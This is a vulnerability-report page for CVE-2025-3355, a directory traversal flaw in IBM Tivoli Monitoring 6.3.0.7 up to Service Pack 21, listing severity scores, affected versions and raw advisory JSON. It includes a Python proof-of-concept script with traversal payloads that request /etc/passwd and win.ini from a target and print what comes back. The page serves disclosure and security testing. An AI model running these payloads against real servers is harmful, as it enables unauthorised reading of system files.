Security Vulnerability Report
CVE-2025-3355 CVSS 7.5 HIGH

CVE-2025-3355

Published: 2025-10-30 20:15:39
Last Modified: 2025-11-07 01:58:25

Description

IBM Tivoli Monitoring 6.3.0.7 through 6.3.0.7 Service Pack 21 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp12:*:*:*:*:*:* - VULNERABLE
IBM Tivoli Monitoring 6.3.0.7
IBM Tivoli Monitoring 6.3.0.7 Service Pack 1
IBM Tivoli Monitoring 6.3.0.7 Service Pack 2
IBM Tivoli Monitoring 6.3.0.7 Service Pack 3
IBM Tivoli Monitoring 6.3.0.7 Service Pack 4
IBM Tivoli Monitoring 6.3.0.7 Service Pack 5
IBM Tivoli Monitoring 6.3.0.7 Service Pack 6
IBM Tivoli Monitoring 6.3.0.7 Service Pack 7
IBM Tivoli Monitoring 6.3.0.7 Service Pack 8
IBM Tivoli Monitoring 6.3.0.7 Service Pack 9
IBM Tivoli Monitoring 6.3.0.7 Service Pack 10
IBM Tivoli Monitoring 6.3.0.7 Service Pack 11
IBM Tivoli Monitoring 6.3.0.7 Service Pack 12
IBM Tivoli Monitoring 6.3.0.7 Service Pack 13
IBM Tivoli Monitoring 6.3.0.7 Service Pack 14
IBM Tivoli Monitoring 6.3.0.7 Service Pack 15
IBM Tivoli Monitoring 6.3.0.7 Service Pack 16
IBM Tivoli Monitoring 6.3.0.7 Service Pack 17
IBM Tivoli Monitoring 6.3.0.7 Service Pack 18
IBM Tivoli Monitoring 6.3.0.7 Service Pack 19
IBM Tivoli Monitoring 6.3.0.7 Service Pack 20
IBM Tivoli Monitoring 6.3.0.7 Service Pack 21

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-3355 Path Traversal PoC
# Target: IBM Tivoli Monitoring 6.3.0.7 - 6.3.0.7 SP21
# Type: Directory Traversal
import requests
import sys

TARGET_URL = "https://target-ibm-tivoli.com"


def test_path_traversal():
    """Test for CVE-2025-3355 Path Traversal vulnerability"""
    # Common sensitive files to test
    # (raw strings keep the backslashes literal instead of forming invalid escapes)
    test_paths = [
        "/../../../../etc/passwd",
        r"/..\..\..\..\windows\win.ini",
        "/file/view?path=../../../../etc/passwd",
        r"/scripts/..\../..\..\etc/passwd",
    ]

    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-3355-Test)",
        "Accept": "*/*",
    }

    print(f"[*] Testing CVE-2025-3355 on {TARGET_URL}")
    print("[*] Target: IBM Tivoli Monitoring Path Traversal")

    for path in test_paths:
        url = f"{TARGET_URL}{path}"
        print(f"\n[+] Testing: {url}")

        try:
            response = requests.get(url, headers=headers, timeout=10, verify=False)

            if response.status_code == 200:
                # Check if response contains file content
                if "root:" in response.text or "[extensions]" in response.text:
                    print("[!] VULNERABLE! Retrieved file content:")
                    print(response.text[:500])
                    return True
            elif response.status_code == 403:
                print("[-] Access forbidden (may indicate traversal attempt detected)")
            else:
                print(f"[-] Status code: {response.status_code}")

        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")

    print("\n[*] Testing completed. No obvious vulnerability detected.")
    return False


if __name__ == "__main__":
    test_path_traversal()

References

https://www.ibm.com/support/pages/node/7249694 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-3355", "sourceIdentifier": "[email protected]", "published": "2025-10-30T20:15:38.673", "lastModified": "2025-11-07T01:58:25.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Tivoli Monitoring 6.3.0.7 through 6.3.0.7 Service Pack 21 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:-:*:*:*:*:*:*", "matchCriteriaId": "15633ADC-6913-4AA1-8524-F139895B1C9D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp1:*:*:*:*:*:*", "matchCriteriaId": "F8F29F79-3813-4B6F-A0FE-3E12711F2827"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp10:*:*:*:*:*:*", "matchCriteriaId": "63F43D7A-2BB8-475A-9F95-5AD83FC2F1E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp11:*:*:*:*:*:*", "matchCriteriaId": "89FE6200-3F7A-43E6-B9DB-24D1B956A509"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp12:*:*:*:*:*:*", "matchCriteriaId": "8632DB2C-4814-43F9-8AA9-682FB000CDC7"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp13:*:*:*:*:*:*", "matchCriteriaId": "9D1B4834-85E5-4E41-9886-03BFD8424FF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp14:*:*:*:*:*:*", "matchCriteriaId": "54AE7933-034F-459B-8C02-2850D3153437"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp15:*:*:*:*:*:*", "matchCriteriaId": "643F4560-5049-466D-B4BA-18DDBBD2BEB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp16:*:*:*:*:*:*", "matchCriteriaId": "3698F091-E08C-4B5C-9E85-1729A19A914F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp17:*:*:*:*:*:*", "matchCriteriaId": "DA218FEA-1091-4098-8A4C-3557924A27EE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp18:*:*:*:*:*:*", "matchCriteriaId": "6993220C-C737-4876-8E52-1C0CB9F109A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp19:*:*:*:*:*:*", "matchCriteriaId": "2AAFF1A2-750F-4C08-B544-0D6BC56D2048"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp2:*:*:*:*:*:*", "matchCriteriaId": "056BA0BC-CA53-4103-AA0A-692226602765"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp20:*:*:*:*:*:*", "matchCriteriaId": "68430D8F-B043-4179-860E-D4DADB7203E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp21:*:*:*:*:*:*", "matchCriteriaId": "B9984364-3AFB-4E06-97B0-53B7D5657882"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp3:*:*:*:*:*:*", "matchCriteriaId": "FC469C26-0D30-40CF-8A24-AC7940DD9D44"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp4:*:*:*:*:*:*", "matchCriteriaId": "2E6529C0-2017-413A-9FF8-D3D09475E867"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp5:*:*:*:*:*:*", "matchCriteriaId": "BF411C3F-AB57-4F4B-92C7-6F6C142F2F64"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp6:*:*:*:*:*:*", "matchCriteriaId": "C6BC45D1-9BE9-44FC-A99A-FF99F7393274"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp7:*:*:*:*:*:*", "matchCriteriaId": "53D77364-F817-4BE8-BF25-1537180B06DE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp8:*:*:*:*:*:*", "matchCriteriaId": "680F331C-D4C7-4280-9981-9848BAE460C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp9:*:*:*:*:*:*", "matchCriteriaId": "3C280072-A982-4A9F-A740-00838B72259B"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7249694", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}